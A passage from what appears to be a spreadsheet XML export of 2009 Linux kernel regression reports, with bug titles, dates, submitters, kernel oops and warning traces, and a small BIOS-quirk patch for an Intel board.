[&lt;ffffffff8105e4d4&gt;] worker_thread+0x144/0x260 [ 60.816209] [&lt;ffffffff810635c0&gt;] ? autoremove_wake_function+0x0/0x40 [ 60.816211] [&lt;ffffffff8105e390&gt;] ? worker_thread+0x0/0x260 [ 60.816213] [&lt;ffffffff810631e6&gt;] kthread+0x96/0xa0 [ 60.816215] [&lt;ffffffff8100c69a&gt;] child_rip+0xa/0x20 [ 60.816217] [&lt;ffffffff81063150&gt;] ? kthread+0x0/0xa0 [ 60.816219] [&lt;ffffffff8100c690&gt;] ? child_rip+0x0/0x20 [ 60.816220] ---[ end trace e934ad520ce5f9cf ]--- [ 11.621573] PM: resume devices took 5.784 seconds [ 11.621574] ------------[ cut here ]------------ [ 11.621579] WARNING: at kernel/power/suspend_test.c:52 suspend_test_finish+0x7c/0x80() [ 11.621580] Hardware name: [ 11.621580] Component: resume devices [ 11.621581] Modules linked in: [ 11.621583] Pid: 1, comm: swapper Not tainted 2.6.31-rc1-25446-g1ae8c0a #1 [ 11.621585] Call Trace: [ 11.621589] [&lt;ffffffff8104a8e8&gt;] warn_slowpath_common+0x78/0xb0 [ 11.621590] [&lt;ffffffff8104a97c&gt;] warn_slowpath_fmt+0x3c/0x40 [ 11.621592] [&lt;ffffffff8107ce7c&gt;] suspend_test_finish+0x7c/0x80 [ 11.621594] [&lt;ffffffff8107cac1&gt;] suspend_devices_and_enter+0xb1/0x210 [ 11.621595] [&lt;ffffffff8107cd4a&gt;] enter_state+0x12a/0x150 [ 11.621598] [&lt;ffffffff81377843&gt;] ? rtc_time_to_tm+0xe3/0x1a0 [ 11.621600] [&lt;ffffffff8107cd8d&gt;] pm_suspend+0x1d/0x30 [ 11.621603] [&lt;ffffffff81748f83&gt;] test_suspend+0x140/0x1a7 [ 11.621605] [&lt;ffffffff81748e43&gt;] ? test_suspend+0x0/0x1a7 [ 11.621608] [&lt;ffffffff8100905b&gt;] do_one_initcall+0x4b/0x190 [ 11.621610] [&lt;ffffffff8109d802&gt;] ? register_irq_proc+0xe2/0x110 [ 11.621613] [&lt;ffffffff81140000&gt;] ? load_elf_binary+0x1b0/0x1fe0 [ 11.621616] [&lt;ffffffff817346ef&gt;] kernel_init+0x169/0x1bf [ 11.621618] [&lt;ffffffff8100c69a&gt;] child_rip+0xa/0x20 [ 11.621619] [&lt;ffffffff81734586&gt;] ? kernel_init+0x0/0x1bf [ 11.621621] [&lt;ffffffff8100c690&gt;] ? child_rip+0x0/0x20 [ 11.621622] ---[ end trace e934ad520ce5f9ce ]---</t>
  </si>
  <si>
    <t>[2.6.30] Modesetting on Mobility Radeon X700 displays black screen</t>
  </si>
  <si>
    <t>2009-07-06 10:47 UTC</t>
  </si>
  <si>
    <t>Ken Lewis</t>
  </si>
  <si>
    <t>2012-06-12 10:24 UTC</t>
  </si>
  <si>
    <t>Using the new import of Dave Airlie's Radeon KMS DRI driver, my laptop screen (LVDS-connected) goes blank and stays blank while using KMS and modeset=1. Chip is a Modility Radeon X700 in a MSI Megabook M635 (also known as MS-1029) with a Turion 64 chip running X86-64 userland from Ubuntu (in particular, Karmic Koala and Kubuntu KDE4). I build my own kernels from mainline to test and will attach dmesg output, Xorg.0.log output (which also apes the Kernel's can't inability to find the LVDS connector -- don't be confused, I'm not complaining about X.org here), and dmesg output. r4xx_atom does not need to be forced: from reading the source and logs, the chip is identified as ATOMBIOS. In my own disgnosis, I found that there is a quirk that matches this notebook in driver/gpu/drm/atombios.c but it is not used. Also, the drm.debug=1 option shows that the VGA and LVDS connectors are identified but no connector is assigned to the LVDS encoder, which I believe is why the screen is blank.</t>
  </si>
  <si>
    <t>p54 gets a "tx refused but queue active" WARNING from mac80211</t>
  </si>
  <si>
    <t>2009-07-06 20:36 UTC</t>
  </si>
  <si>
    <t>2010-03-05 18:56 UTC</t>
  </si>
  <si>
    <t>p54usb generates the following warning: (Note: My kernel is dirty due to testing a fix for a regression.): ------------[ cut here ]------------ WARNING: at net/mac80211/tx.c:1325 ieee80211_tx+0x23c/0x298 [mac80211]() Hardware name: HP Pavilion dv2700 Notebook PC tx refused but queue active Modules linked in: p54usb p54common led_class mac80211 cfg80211 rfkill aes_x86_64 aes_generic af_packet snd_pcm_oss snd_mixer_oss snd_seq snd_seq_device nfs lockd nfs_acl auth_rpcgss vboxnetflt sunrpc vboxdrv cpufreq_conservative cpufreq_userspace cpufreq_powersave powernow_k8 fuse ext4 jbd2 crc16 loop dm_mod ide_cd_mod cdrom pata_amd snd_hda_codec_conexant arc4 ecb ide_pci_generic uvcvideo snd_hda_intel snd_hda_codec videodev snd_pcm v4l1_compat snd_timer v4l2_compat_ioctl32 snd amd74xx i2c_nforce2 battery soundcore ac button serio_raw k8temp joydev snd_page_alloc ide_core i2c_core forcedeth hwmon sg sd_mod ohci_hcd ehci_hcd usbcore edd ahci libata scsi_mod ext3 mbcache jbd fan thermal processor [last unloaded: led_class] Pid: 9773, comm: firefox Tainted: G W 2.6.31-rc2-Linus-dirty #181 Call Trace: [&lt;ffffffffa068bf9a&gt;] ? ieee80211_tx+0x23c/0x298 [mac80211] [&lt;ffffffff8103c17e&gt;] warn_slowpath_common+0x77/0xa4 [&lt;ffffffff8103c1f8&gt;] warn_slowpath_fmt+0x3c/0x3e [&lt;ffffffff8105e38c&gt;] ? trace_hardirqs_on+0xd/0xf [&lt;ffffffffa068beeb&gt;] ? ieee80211_tx+0x18d/0x298 [mac80211] [&lt;ffffffffa068bf9a&gt;] ieee80211_tx+0x23c/0x298 [mac80211] [&lt;ffffffffa068bdef&gt;] ? ieee80211_tx+0x91/0x298 [mac80211] [&lt;ffffffffa068ccf5&gt;] ieee80211_master_start_xmit+0x309/0x33c [mac80211] [&lt;ffffffff811e5403&gt;] dev_hard_start_xmit+0x254/0x302 [&lt;ffffffff811e520d&gt;] ? dev_hard_start_xmit+0x5e/0x302 [&lt;ffffffff811f6760&gt;] __qdisc_run+0xf5/0x208 [&lt;ffffffff811e5827&gt;] dev_queue_xmit+0x263/0x39b [&lt;ffffffff811e5739&gt;] ? dev_queue_xmit+0x175/0x39b [&lt;ffffffffa068c9cc&gt;] ieee80211_subif_start_xmit+0x53c/0x55c [mac80211] [&lt;ffffffffa068c6b1&gt;] ? ieee80211_subif_start_xmit+0x221/0x55c [mac80211] [&lt;ffffffff8105e341&gt;] ? trace_hardirqs_on_caller+0xf1/0x12f [&lt;ffffffff811dcee9&gt;] ? __kfree_skb+0x82/0x86 [&lt;ffffffff811e5403&gt;] dev_hard_start_xmit+0x254/0x302 [&lt;ffffffff811e520d&gt;] ? dev_hard_start_xmit+0x5e/0x302 [&lt;ffffffff811f6760&gt;] __qdisc_run+0xf5/0x208 [&lt;ffffffff811e5827&gt;] dev_queue_xmit+0x263/0x39b [&lt;ffffffff811e5739&gt;] ? dev_queue_xmit+0x175/0x39b [&lt;ffffffff811eb6aa&gt;] neigh_resolve_output+0x2a3/0x2d8 [&lt;ffffffff81208ab3&gt;] ip_finish_output+0x239/0x27f [&lt;ffffffff81207294&gt;] ? ip_generic_getfrag+0x45/0x8b [&lt;ffffffff81208ba2&gt;] ip_output+0xa9/0xad [&lt;ffffffff811d8b81&gt;] ? lock_sock_nested+0xe9/0xf8 [&lt;ffffffff81207c35&gt;] ip_local_out+0x20/0x24 [&lt;ffffffff81207f08&gt;] ip_push_pending_frames+0x2cf/0x33f [&lt;ffffffff81222f41&gt;] udp_push_pending_frames+0x2d1/0x32d [&lt;ffffffff81224660&gt;] udp_sendmsg+0x51a/0x620 [&lt;ffffffff8122a0cc&gt;] inet_sendmsg+0x46/0x53 [&lt;ffffffff811d6654&gt;] sock_sendmsg+0xdf/0xf8 [&lt;ffffffff8105f7a1&gt;] ? __lock_acquire+0x7c3/0x1607 [&lt;ffffffff81200b0b&gt;] ? __ip_route_output_key+0x1c5/0xaf0 [&lt;ffffffff8104fecc&gt;] ? autoremove_wake_function+0x0/0x38 [&lt;ffffffff810b05bc&gt;] ? fget_light+0x4c/0xe1 [&lt;ffffffff810b063b&gt;] ? fget_light+0xcb/0xe1 [&lt;ffffffff810b05bc&gt;] ? fget_light+0x4c/0xe1 [&lt;ffffffff811d5f84&gt;] ? sockfd_lookup_light+0x1b/0x54 [&lt;ffffffff811d71d4&gt;] sys_sendto+0xdf/0x107 [&lt;ffffffff810bbc3b&gt;] ? sys_fcntl+0x2a5/0x367 [&lt;ffffffff810b05bc&gt;] ? fget_light+0x4c/0xe1 [&lt;ffffffff8100ba6b&gt;] system_call_fastpath+0x16/0x1b ---[ end trace 82e427a0c6fcfb5d ]--- A band-aid fix is available that should be suitable for 2.6.31. A more invasive fix is currently being tested for submission to wireless-testing.</t>
  </si>
  <si>
    <t>fio sync read 4k block size 35% regression</t>
  </si>
  <si>
    <t>2009-07-06 21:59 UTC</t>
  </si>
  <si>
    <t>2009-08-03 20:57 UTC</t>
  </si>
  <si>
    <t>Subject : fio sync read 4k block size 35% regression Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2009-07-01 11:25 References : http://lkml.org/lkml/2009/6/30/679 Handled-By : Wu Fengguang &lt;fengguang.wu@intel.com&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. Caused by: commit 51daa88ebd8e0d437289f589af29d4b39379ea76 Author: Wu Fengguang &lt;fengguang.wu@intel.com&gt; Date: Tue Jun 16 15:31:24 2009 -0700 readahead: remove sync/async readahead call dependency First-Bad-Commit : 51daa88ebd8e0d437289f589af29d4b39379ea76</t>
  </si>
  <si>
    <t>Cannot Recognize Empty DVD Media</t>
  </si>
  <si>
    <t>2.6.31-rc1-git9</t>
  </si>
  <si>
    <t>2009-07-06 22:02 UTC</t>
  </si>
  <si>
    <t>2009-07-12 20:05 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] Linux-2.6.31-rc1-git9 Cannot Recognize Empty DVD Media Submitter : Tarkan Erimer &lt;tarkan.erimer@turknet.net.tr&gt; Date : 2009-07-02 16:23 References : http://lkml.org/lkml/2009/7/2/178 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.31-rc2 soft lockups, RPC-related</t>
  </si>
  <si>
    <t>2.6.31-rc2</t>
  </si>
  <si>
    <t>2009-07-06 22:07 UTC</t>
  </si>
  <si>
    <t>2009-07-27 22:24 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc2 soft lockups; traces point at rpc_wake_up, nfs4_run_state_manager, bit_waitqueue Submitter : Paul Collins &lt;paul@burly.ondioline.org&gt; Date : 2009-07-05 7:17 References : http://marc.info/?l=linux-kernel&amp;m=124677884816794&amp;w=4 Notify-Also : Ingo Molnar &lt;mingo@elte.hu&gt; Notify-Also : Trond Myklebust &lt;Trond.Myklebust@netapp.com&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel BUG at fs/notify/notification.c:93!</t>
  </si>
  <si>
    <t>2009-07-06 22:44 UTC</t>
  </si>
  <si>
    <t>2009-08-29 23:29 UTC</t>
  </si>
  <si>
    <t>Eric Paris</t>
  </si>
  <si>
    <t>Subject : kernel BUG at fs/notify/notification.c:93! Submitter : "Mikko C." &lt;mikko.cal@gmail.com&gt; Date : 2009-06-04 10:16 References : http://lkml.org/lkml/2009/7/4/12 Handled-By : Eric Paris &lt;eparis@redhat.com&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>hitting lockdep limits...</t>
  </si>
  <si>
    <t>2009-07-06 22:51 UTC</t>
  </si>
  <si>
    <t>2009-07-27 22:26 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.31-rc2] hitting lockdep limits... Submitter : Daniel J Blueman &lt;daniel.blueman@gmail.com&gt; Date : 2009-07-05 18:19 References : http://marc.info/?l=linux-kernel&amp;m=124681799023782&amp;w=4 Notify-Also : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Inconsistent {IN-RECLAIM_FS-W} -&gt; {RECLAIM_FS-ON-W} usage.</t>
  </si>
  <si>
    <t>2009-07-06 22:55 UTC</t>
  </si>
  <si>
    <t>2009-08-07 22:16 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc2 -- INFO: inconsistent lock state -- inconsistent {IN-RECLAIM_FS-W} -&gt; {RECLAIM_FS-ON-W} usage. Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2.6.31-rc2 -- INFO: inconsistent lock References : http://marc.info/?l=linux-kernel&amp;m=124685417325348&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>tty layer instabilities</t>
  </si>
  <si>
    <t>2009-07-06 22:59 UTC</t>
  </si>
  <si>
    <t>2009-07-29 11:31 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc tty layer instabilities Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2009-07-06 13:43 References : http://marc.info/?l=linux-kernel&amp;m=124688781732419&amp;w=4 Notify-Also : Alan Cox &lt;alan@lxorguk.ukuu.org.uk&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>regression in 2.6.31-rcX since commit a1091aa</t>
  </si>
  <si>
    <t>2009-07-06 23:06 UTC</t>
  </si>
  <si>
    <t>2009-07-07 11:17 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] p54: Fix regression in 2.6.31-rcX since commit a1091aa - sleeping function called from invalid context Submitter : Larry Finger &lt;Larry.Finger@lwfinger.net&gt; Date : 2009-07-06 19:07 References : http://marc.info/?l=linux-kernel&amp;m=124690725130645&amp;w=4 Handled-By : David Miller &lt;davem@davemloft.net&gt; Patch : http://patchwork.kernel.org/patch/34292/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Intel BIOS - Corrupted low memory at ffff880000004200</t>
  </si>
  <si>
    <t>2009-07-07 05:16 UTC</t>
  </si>
  <si>
    <t>2012-06-12 10:30 UTC</t>
  </si>
  <si>
    <t>I'm getting "Corrupted low memory" trace with my Intel DG45ID board after resume. This board has different dmi-bios-vendor to ami or phonix... so probably it will be nice to have it in your patch. Here is trace after resume: =============================================== [ 600.816088] Corrupted low memory at ffff880000004200 (4200 phys) = 00420301 [ 600.816093] ------------[ cut here ]------------ [ 600.816100] WARNING: at arch/x86/kernel/check.c:134 check_for_bios_corruption+0xe4/0xf0() [ 600.816102] Hardware name: [ 600.816103] Memory corruption detected in low memory [ 600.816105] Modules linked in: nls_iso8859_1 nls_cp437 vfat fat binfmt_misc kvm_intel kvm snd_hda_codec_intelhdmi snd_hda_codec_idt snd_hda_intel snd_hda_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device snd psmouse soundcore e1000e serio_raw iTCO_wdt iTCO_vendor_support snd_page_alloc [ 600.816129] Pid: 9, comm: events/0 Tainted: G W 2.6.31-rc1-25446-g1ae8c0a #1 [ 600.816131] Call Trace: [ 600.816136] [&lt;ffffffff8104a8e8&gt;] warn_slowpath_common+0x78/0xb0 [ 600.816139] [&lt;ffffffff8104a97c&gt;] warn_slowpath_fmt+0x3c/0x40 [ 600.816142] [&lt;ffffffff8102aff4&gt;] check_for_bios_corruption+0xe4/0xf0 [ 600.816145] [&lt;ffffffff8102b000&gt;] ? check_corruption+0x0/0x30 [ 600.816148] [&lt;ffffffff8102b009&gt;] check_corruption+0x9/0x30 [ 600.816152] [&lt;ffffffff8105e4d4&gt;] worker_thread+0x144/0x260 [ 600.816155] [&lt;ffffffff810635c0&gt;] ? autoremove_wake_function+0x0/0x40 [ 600.816158] [&lt;ffffffff8105e390&gt;] ? worker_thread+0x0/0x260 [ 600.816161] [&lt;ffffffff810631e6&gt;] kthread+0x96/0xa0 [ 600.816165] [&lt;ffffffff8100c69a&gt;] child_rip+0xa/0x20 [ 600.816168] [&lt;ffffffff81063150&gt;] ? kthread+0x0/0xa0 [ 600.816171] [&lt;ffffffff8100c690&gt;] ? child_rip+0x0/0x20 [ 600.816173] ---[ end trace 03ff161c20a96dae ]--- ===================================================================== result of "dmidecode -s bios-vendor" is "Intel Corp." here is patch against latest git. It's working fine with my board. diff --git a/arch/x86/kernel/setup.c b/arch/x86/kernel/setup.c index de2cab1..89d00e2 100644 --- a/arch/x86/kernel/setup.c +++ b/arch/x86/kernel/setup.c @@ -672,6 +672,13 @@ static struct dmi_system_id __initdata bad_bios_dmi_table[] = { DMI_MATCH(DMI_BIOS_VENDOR, "Phoenix Technologies"), }, }, + { + .callback = dmi_low_memory_corruption, + .ident = "Intel BIOS", + .matches = { + DMI_MATCH(DMI_BIOS_VENDOR, "Intel Corp."), + }, + }, #endif {} };</t>
  </si>
  <si>
    <t>Soft-Lockup/Race in networking in 2.6.31-rc1+195</t>
  </si>
  <si>
    <t>2009-07-07 11:24 UTC</t>
  </si>
  <si>
    <t>2009-07-26 22:50 UTC</t>
  </si>
  <si>
    <t>Subject : Soft-Lockup/Race in networking in 2.6.31-rc1+195 (possibly caused by netem) Submitter : Andres Freund &lt;andres@anarazel.de&gt; Date : 2009-07-01 01:20 References : http://lkml.org/lkml/2009/6/30/398 Handled-By : Jarek Poplawski &lt;jarkao2@gmail.com&gt; Notify-Also : Joao Correia &lt;joaomiguelcorreia@gmail.com&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.30 leaking keys on console switch</t>
  </si>
  <si>
    <t>2009-07-07 11:27 UTC</t>
  </si>
  <si>
    <t>2010-01-19 21:53 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] 2.6.30 leaking keys on console switch Submitter : Andi Kleen &lt;andi@firstfloor.org&gt; Date : 2009-07-07 8:44 References : http://marc.info/?l=linux-kernel&amp;m=124695628924382&amp;w=4 Handled-By : Jiri Kosina &lt;jkosina@suse.cz&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>iwlagn (4965): regression when hardware rf switch is used</t>
  </si>
  <si>
    <t>2009-07-07 20:40 UTC</t>
  </si>
  <si>
    <t>2009-08-05 11:35 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.31-rc1] iwlagn (4965): regression when hardware rf switch is used Submitter : Frans Pop &lt;elendil@planet.nl&gt; Date : 2009-06-29 11:28 References : http://lkml.org/lkml/2009/6/29/88 Handled-By : Reinette Chatre &lt;reinette.chatre@intel.com&gt; Patch : http://lkml.org/lkml/2009/6/30/224 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Load average flatlines after returning from hibernate</t>
  </si>
  <si>
    <t>2.6.30-5659-g300df7d</t>
  </si>
  <si>
    <t>2009-07-09 15:14 UTC</t>
  </si>
  <si>
    <t>2009-07-27 22:31 UTC</t>
  </si>
  <si>
    <t>I haven't yet bisected this, as I did a bug search but don't know if anyone posted it on LKML. If it's a new bug, tell me and I'll bisect. I first tried the 2.6.31 tree pre-rc1, with 2.6.30-5659-g300df7d. From that point on, thru 2.6.31-rc2-214-g34f2547 at least, everything works well until first hibernate. Returning from hibernate, load average drops toward zero as the pre-hibernate average scrolls out of the window, until it's zero. There it stays. I first noticed this recompiling the kernel after my next git pull a few days later, as I was using makeopts of "-j -l25" or some such, and of course with zeroed load average and no job limit apart from that[1], the full force of the kernel's massively parallelizable make bore down upon me, sending me way into swap even with 8 gigs RAM. As I run Gentoo, I had the same issues emerging programs. Luckily I run 4-spindle striped swap, so it wasn't /too/ bad, tho everything did basically stop responding for a few minutes until the jobs quick spawning as fast as swap could absorb them. Today I finally got around to confirming that it was the hibernate that did it, and that 2.6.30 release was free of the regression, while everything beyond my first 2.6.31 series git pull has it. Hardware info: Tyan s2885 mobo, x86_64 dual Opteron 290 (so dual-dual-core), 8 gigs RAM, 4 x 300-gig SATA drives, Radeon 9200 AGP graphics, dual LCDs @ 1920x1200 native each, USB connected Logitech wireless mouse/keyboard. Software info: Gentoo/~amd64, gcc-4.4.0, mainline kernel, SMP, NUMA, normally working hibernate, those 4 SATA drives in md/mdp/RAID (personalities 0,1,6, main system as RAID-6), LVM2, no initramfs/initrd, rootfs is kernel command-line-assembled mdp/RAID, reiserfs, radeonfb @ native but WITHOUT the new KMS enabled. Once I get a reply confirming it's a new bug, I'll attach full .config and can attach boot log if necessary. I'll also do a git bisect to nail it down within that first 5659 commits, but if it's already done, as it was the last time I filed a bug, I can skip all those recompile and reboot, then hibernate and resume to test, cycles. =:^) BTW, is there a good way to get on the regressions tracking list without filing a bug? I've been on the regression list CC after reporting a bug, but would love to get it routinely, either by subscribing to a regression list somewhere, or with a link to the web-page version of it. ..... [1] I wasn't running a -j limit as make's jobserver apparently had a race a version or two ago, and would occasionally error out complaining about job token count mismatches. Don't put a limit on job count, depending entirely on the -l load average limit, and those go away! I think it's fixed now, or at least I've not yet encountered it after adding back a -j limit. Now I'm running -j40 -l25 for the kernel, thus at least capping the lack of load average usage to something sane. Running multi-hundred parallel jobs and going gigs into swap was fun the first few times I tried it years ago, but it has long since lost its novelty.</t>
  </si>
  <si>
    <t>oops on HP/Compaq 6910p lid closure</t>
  </si>
  <si>
    <t>2009-07-09 15:17 UTC</t>
  </si>
  <si>
    <t>2010-03-08 01:50 UTC</t>
  </si>
  <si>
    <t>Stephen reported that on 2.6.30, closing the lid of an HP/Compaq 6910p laptop causes an oops (see attachment). This worked correctly in 2.6.29.4, so this is a regression. If Stephen unloads the "button" module, the laptop locks up instead of oopsing when closing the lid. Reported at http://lkml.org/lkml/2009/7/9/100</t>
  </si>
  <si>
    <t>Lockdep complains about possible irq lock inversion dependency</t>
  </si>
  <si>
    <t>2009-07-10 16:34 UTC</t>
  </si>
  <si>
    <t>2012-06-12 10:32 UTC</t>
  </si>
  <si>
    <t>drivers_infiniband-rdma</t>
  </si>
  <si>
    <t>Created attachment 22299 [details] Kernel config Kernel: 2.6.30.1 with SCST zero-copy transfer completion notification and scsi_execute_fifo patches applied. These two patches do not modify any InfiniBand code. Setup: - Two servers connected back-to-back via InfiniBand. - OpenSM is running on one of the two servers. After having shut down one of the two servers, lockdep complained about possible irq lock inversion.</t>
  </si>
  <si>
    <t>kmemleak + BUG: unable to handle kernel paging request</t>
  </si>
  <si>
    <t>2009-07-11 06:49 UTC</t>
  </si>
  <si>
    <t>2012-06-13 13:21 UTC</t>
  </si>
  <si>
    <t>First I mounted debugfs with "mount -t debugfs nodev /sys/kernel/debug/". Then I executed "echo scan &gt;/sys/kernel/debug/kmemleak" and "cat /sys/kernel/debug/kmemleak" a few times. I get the following message: [ 1649.863693] BUG: unable to handle kernel paging request at 6b6b6b6b [ 1649.863706] IP: [&lt;c01b2f95&gt;] kmemleak_seq_next+0x75/0x120 [ 1649.863718] *pde = 00000000 [ 1649.863723] Oops: 0000 [#1] PREEMPT [ 1649.863728] last sysfs file: /sys/devices/system/cpu/cpu0/cpuidle/state2/time [ 1649.863733] Modules linked in: gspca_sunplus gspca_main videodev v4l1_compat via drm agpgart ppdev lp ipv6 powernow_k8 cpufreq_powersave cpufreq_ondemand cpufreq_userspace cpufreq_conservative leds_clevo_mail led_class snd_via82xx snd_via82xx_modem snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss usbhid snd_pcm snd_mpu401_uart mousedev snd_seq_oss snd_seq_midi pcmcia snd_rawmidi firmware_class snd_seq_midi_event snd_seq snd_timer snd_seq_device serio_raw snd i2c_viapro ide_cd_mod ehci_hcd pcspkr uhci_hcd psmouse k8temp hwmon video backlight 8139too snd_page_alloc cdrom soundcore yenta_socket rsrc_nonstatic usbcore i2c_core nls_base pcmcia_core mii output battery 8250_pnp 8250 rtc_cmos parport_pc serial_core parport rtc_core rtc_lib button thermal processor ac evdev [ 1649.863820] [ 1649.863825] Pid: 4464, comm: cat Not tainted (2.6.31-rc2 #1) K8N800 [ 1649.863830] EIP: 0060:[&lt;c01b2f95&gt;] EFLAGS: 00210292 CPU: 0 [ 1649.863834] EIP is at kmemleak_seq_next+0x75/0x120 [ 1649.863838] EAX: c7241df0 EBX: 00000000 ECX: 00000000 EDX: 6b6b6b6b [ 1649.863842] ESI: e7ea1c70 EDI: c039a168 EBP: db191f1c ESP: db191ef4 [ 1649.863846] DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 [ 1649.863850] Process cat (pid: 4464, ti=db190000 task=e4190620 task.ti=db190000) [ 1649.863853] Stack: [ 1649.863856] 00000002 00000001 00000000 c01b2f58 00000000 00000002 c7241df0 00000000 [ 1649.863866] &lt;0&gt; e7ea1c70 c039a168 db191f64 c01d01a3 ee911008 00000cc0 00001000 08051000 [ 1649.863877] &lt;0&gt; e7e8bc78 e7ea1c98 00000000 00000000 ee911008 00000002 ee911008 0003944e [ 1649.863888] Call Trace: [ 1649.863895] [&lt;c01b2f58&gt;] ? kmemleak_seq_next+0x38/0x120 [ 1649.863902] [&lt;c01d01a3&gt;] ? seq_read+0x323/0x3d0 [ 1649.863908] [&lt;c01b6fe9&gt;] ? vfs_read+0x99/0x160 [ 1649.863913] [&lt;c01cfe80&gt;] ? seq_read+0x0/0x3d0 [ 1649.863919] [&lt;c01b716d&gt;] ? sys_read+0x3d/0x70 [ 1649.863925] [&lt;c0102e44&gt;] ? sysenter_do_call+0x12/0x32 [ 1649.863928] Code: c0 c7 44 24 0c 58 2f 1b c0 c7 44 24 08 00 00 00 00 c7 44 24 04 01 00 00 00 c7 04 24 02 00 00 00 e8 d1 2e fa ff 8b 45 f0 8b 50 20 &lt;8b&gt; 02 0f 18 00 90 81 fa 60 ad 49 c0 89 d6 c7 45 e8 00 00 00 00 [ 1649.863989] EIP: [&lt;c01b2f95&gt;] kmemleak_seq_next+0x75/0x120 SS:ESP 0068:db191ef4 [ 1649.863996] CR2: 000000006b6b6b6b [ 1649.864034] ---[ end trace 1a6e31a050e7af6e ]--- [ 1649.864040] note: cat[4464] exited with preempt_count 1 [ 1649.864570] Slab corruption: kmemleak_object start=c7241df0, len=192 [ 1649.864576] Redzone: 0x9f911029d74e35b/0x9f911029d74e35b. [ 1649.864579] Last user: [&lt;c01b30a2&gt;](free_object_rcu+0x62/0x70) [ 1649.864589] 000: 01 00 00 00 6b 6b 6b 6b ff ff ff ff ff ff ff ff [ 1649.864607] 040: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6c 6b 6b 6b [ 1649.864626] Prev obj: start=c7241d18, len=192 [ 1649.864630] Redzone: 0xd84156c5635688c0/0xd84156c5635688c0. [ 1649.864633] Last user: [&lt;c01b4154&gt;](kmemleak_alloc+0x74/0x290) [ 1649.864639] 000: 01 00 00 00 ad 4e ad de ff ff ff ff ff ff ff ff [ 1649.864656] 010: cc 3a a2 c0 00 00 00 00 31 02 43 c0 01 00 00 00 [ 1649.864673] Next obj: start=c7241ec8, len=192 [ 1649.864676] Redzone: 0xd84156c5635688c0/0xd84156c5635688c0. [ 1649.864679] Last user: [&lt;c01b4154&gt;](kmemleak_alloc+0x74/0x290) [ 1649.864685] 000: 01 00 00 00 ad 4e ad de ff ff ff ff ff ff ff ff [ 1649.864702] 010: cc 3a a2 c0 00 00 00 00 31 02 43 c0 01 00 00 00</t>
  </si>
  <si>
    <t>AHCI on HP Compaq 6715s broken, did not detect slots/ports -&gt; unable to boot</t>
  </si>
  <si>
    <t>2.6.31-rc2-git7</t>
  </si>
  <si>
    <t>2009-07-11 20:48 UTC</t>
  </si>
  <si>
    <t>2009-08-03 21:37 UTC</t>
  </si>
  <si>
    <t>Created attachment 22314 [details] broken AHCI slot/port detection Hi folks, I wanted to test 2.6.31-rc to look at radeon KMS support, but the kernel doesnt boot because it cannot access my HD on my HP Compaq 6715s Notebook. I think this could affect other systems too. Everything works great using 2.6.30.1 so its some kind of regression. I attach dmesg output of both kernels for comparison. The first development version I've tested was 2.6.31-rc1, the regression also occurred there.</t>
  </si>
  <si>
    <t>KMS with Intel Graphic fails</t>
  </si>
  <si>
    <t>2.6.31-rcX</t>
  </si>
  <si>
    <t>2009-07-15 08:05 UTC</t>
  </si>
  <si>
    <t>mailinglists</t>
  </si>
  <si>
    <t>2010-09-03 06:22 UTC</t>
  </si>
  <si>
    <t>i am trying kms with a intel chipset, linux-2.6.31-rc3, recent mesa-master and libdrm-master from 13.07.2009 and i am become follow error when i am inserting i915.ko: [ 2.105376] i915 0000:00:02.0: power state changed by ACPI to D0 [ 2.105489] i915 0000:00:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 2.105598] i915 0000:00:02.0: setting latency timer to 64 [ 2.108792] BUG: unable to handle kernel NULL pointer dereference at (null) [ 2.109046] IP: [&lt;(null)&gt;] (null) [ 2.109224] *pde = 00000000 [ 2.109397] Oops: 0000 [#1] PREEMPT SMP [ 2.109716] last sysfs file: /sys/devices/pci0000:00/0000:00:1f.2/host0/target0:0:0/0:0:0:0/type [ 2.109856] Modules linked in: led_class ieee1394 snd_hda_intel(+) snd_hda_codec snd_pcm snd_timer snd soundcore snd_page_alloc i2c_i801 i915(+) drm ehci_hcd(+) uhci_hcd(+) i2c_algo_bit video backlight output e1000e usbcore [ 2.111508] [ 2.111612] Pid: 1018, comm: modprobe Not tainted (2.6.31-rc3 #1) 7667V4E [ 2.111723] EIP: 0060:[&lt;00000000&gt;] 